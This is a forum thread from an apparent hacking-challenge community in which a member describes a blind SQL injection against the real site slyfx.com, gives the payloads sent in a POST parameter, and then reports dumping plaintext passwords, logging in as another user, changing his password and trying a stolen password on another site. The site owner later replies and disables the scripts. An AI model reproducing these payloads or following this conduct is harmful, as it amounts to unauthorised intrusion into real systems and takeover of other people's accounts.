logo
::[Home]
::[News]
::[Challenges]
::[Ranking]
::[My Account]
::[Forum]
::[Chat]
::[Private Messages]
::[Vulnerable Code]
::[Tutorials]
::[Downloads/Scripts]
::[Support]
::[Links]
::[Contact/FAQ]
::[Login]
0 anonymous
Views: 1088844 Challenges: 342
Users: 12689 Online: 11

Settings
Search
0 new posts

Page 1 of 2

slyfx.com sql injection. – 11 Posts

  • slyfx.com sql injection.

    01/10/2008 20:06
    UnknownUser's Avatar UnknownUser 2,7290
    Not SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot Specified
    yeah it's pretty hard to come up with targets that are noteworthy, but the first real link from<br>http://bright-shadows.net/link.php<br><br>first is meta, second is down, 3rd is hackquest ... been there, 4th slyfx ..<br><br>so here we go.<br><br>How does the site work? with some cgi scripts, that take GET parameters. Presumably they run it through something like<br>| tr -d -c '0123456789' <br>so those get parameters are rock solid.<br><br>Luckily for us, there are also post variables <img alt="\&quot;:D\&quot;" src="%5C"><br><br>the message board (for level 1)<br>http://www.slyfx.com/cgi-bin/wb.cgi?board=1<br>the configurations for the forum<br>http://www.slyfx.com/cgi-bin/wb.cgi?action=options&amp;board=1<br><br>wiii post values.<br><br>we mess around a bit, and we notice:<br>these are the post values<br><pre> radiobutton=0&amp;radiobutton2=0&amp;select=1&amp;action=options&amp;board=1&amp;Submit=Apply </pre><br><br>and what do you know if you enter some garbage as \"select\"<br><pre> Database Error There has been an error in executing a database command. This error has been logged. [ EXECUTE :: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '6666'' at line 1 ] </pre><br><br>It's quite easy to guess that this is the sql that is throwing the error<br><br><pre> UPDATE some_table set something=$_POST[radiobutton], somethingelse=$_POST[radiobutton2], numberofthreads= $_POST[select] where uid=6666 </pre><br><br>so it's trivial to send this as $_POST[select]<br><br><pre> 4' where uid = '6666' and 1 = 1/* </pre><br><br><br><pre> 4' where uid = '6666' and 1 = 2/* </pre><br>(make sure to url encode the =signs when you use live http headers)<br><br>depending on whether or not the change occurs, (you can check that by looking at the settings page again, you have a blind sql injection.<br><br>Tada ...<br><br>note, you have to change the digit at the start, in order to do multiple queries, because you can only see if a change occurs, if that number is actually different from the current setting ...<br><br>there is a users table, don't have too much fun ...<br><div class="\&quot;tbscode_standard_quote_headline\&quot;"><img alt="\&quot;Quote\&quot;" src="%5C">Quote:</div><div class="\&quot;tbscode_standard_quote\&quot;"><br>Lost or forgotten your password? Use this form to get it emailed back to you.<br></div><br><br>I wonder if they store it plain text ... do let me know.
    Edit
    Reply
    Quote
    0 Likes
  • 01/10/2008 20:06
    UnknownUser's Avatar UnknownUser 2,7290
    Not SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot Specified
    hmz, they store it as plain text, that's pretty weak.
    Edit
    Reply
    Quote
    0 Likes
  • 01/10/2008 20:06
    UnknownUser's Avatar UnknownUser 2,7290
    Not SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot Specified
    Heh I can login as Erik over there <img alt="\&quot;:D\&quot;" src="%5C">,<br><br>I changed his password, just so you can't get it anymore.. but i'm sure it's worthless if he doesn't reuse it.<br>If you can't use the pw reset functionality Erik feel free to pm me, or extract your own new pw through the security hole<br><br>PS, erik's password (although a bit short) was pretty strong, Would have taken a while to brute force...<br>to bad it wasn't encrypted.
    Edit
    Reply
    Quote
    0 Likes
  • 01/10/2008 20:06
    UnknownUser's Avatar UnknownUser 2,7290
    Not SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot Specified
    o rats even Caesums password doesn't work on electrica <img alt="\&quot;:)\&quot;" src="%5C"><br><br>pretty weak password though<br><br>by now you guys do listen when I say \"don't reuse passwords\" <img alt="\&quot;:)\&quot;" src="%5C"> I'm touched <img alt="\&quot;:P\&quot;" src="%5C"><br><br>ps: caesum is level10 over at slyfx though .. wii i have access to all slyfx levels...
    Edit
    Reply
    Quote
    0 Likes
  • 01/10/2008 20:06
    UnknownUser's Avatar UnknownUser 2,7290
    Not SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot Specified
    <div class="\&quot;tbscode_standard_quote_headline\&quot;"><img alt="\&quot;Quote\&quot;" src="%5C">Quote:</div><div class="\&quot;tbscode_standard_quote\&quot;"><br> A) There are four main ways, from getting a rank of 3 or higher in the old site, submitting challenge ideas that are likely to be used, finding bugs or security flaws in the site and informing me about them and last of all sponsoring the site (or paying for some hosting in some form).<br></div><br><br>Not that I really want tokens, .. but it doesn't state informing *only* me <img alt="\&quot;:D\&quot;" src="%5C"><br><br>hah, 't was fun.
    Edit
    Reply
    Quote
    0 Likes
  • 01/10/2008 20:06
    quangntenemy's Avatar quangntenemy 7120
    Not SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot Specified
    OMG it's rhican again!<br>He pwnzored another password of mine.<br>Gotta finish my code for finger-print authentication soon.
    Edit
    Reply
    Quote
    0 Likes
  • 01/10/2008 20:06
    UnknownUser's Avatar UnknownUser 2,7290
    Not SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot Specified
    as a minor update, they have pulled the vulnerable script offline. Didn't get any tokens though.. <img alt="\&quot;:P\&quot;" src="%5C">
    Edit
    Reply
    Quote
    0 Likes
  • 01/10/2008 20:06
    Erik's Avatar Erik 5680
    Not SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot Specified
    Hi,<div class="\&quot;tbscode_standard_quote_headline\&quot;"><img alt="\&quot;Quote\&quot;" src="%5C">Quote from <a href="%5C">rhican</a>:</div><div class="\&quot;tbscode_standard_quote\&quot;">Heh I can login as Erik over there <img alt="\&quot;:D\&quot;" src="%5C">,<br><br>I changed his password, just so you can't get it anymore.. but i'm sure it's worthless if he doesn't reuse it.<br>If you can't use the pw reset functionality Erik feel free to pm me, or extract your own new pw through the security hole<br><br>PS, erik's password (although a bit short) was pretty strong, Would have taken a while to brute force...<br>to bad it wasn't encrypted.</div>Congrats, well done! <img alt="\&quot;:thumbsup:\&quot;" src="%5C"><br>It must have been long ago I used to visit this site. I didn't take care of the account.<br>So now it at least had some use at all <img alt="\&quot;^^\&quot;" src="%5C"><br><br>Cu, Erik <img alt="\&quot;:)\&quot;" src="%5C">
    Edit
    Reply
    Quote
    0 Likes
  • 01/10/2008 20:06
    UnknownUser's Avatar UnknownUser 2,7290
    Not SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot Specified
    Haha good work rhican!<br><br>You can see the vuln script @ http://slyfx.com/bad_wb.txt<br>You'll have to excuse the messy code, I was learning perl at the time.<br><br>Considering it was my first ever website (written back in 2001), and has had no updates since then, I think it lasted pretty well! Let me know if you find any other flaws in the above code - always interested. I've disabled all the scripts now, the sign up hasn't worked for years so not much point in keeping them live. In fact the last time I logged into the site was 2005...<br><br>I can't be bothered to make a slyfx version2, so if anyone has any suggestions on what I could use the domain for, let me know.<br><br>slyfx.
    Edit
    Reply
    Quote
    0 Likes
  • 01/10/2008 20:06
    theAnswer's Avatar theAnswer 2010
    Not SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot Specified
    Ugh, slyfx was one of my first challenge sites, even before TheBlackSheep.<br>I was stuck around level 6/3 or something like that, if I remember correctly <img alt="\&quot;:D\&quot;" src="%5C"><br><br>... bye bye <img alt="\&quot;:(\&quot;" src="%5C">
    Edit
    Reply
    Quote
    0 Likes
  • 01/10/2008 20:06
    UnknownUser's Avatar UnknownUser 2,7290
    Not SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot Specified
    hey there slyfx, thanks for the script source, always fun to open the black box, and see if the picture you built up of it by shaking, dropping, probing, licking, kicking, ... actually matches the reality.<br><br>I'll look at it more closely soon. <br><br>Thanks for dropping by,
    Edit
    Reply
    Quote
    0 Likes

Page 1 of 2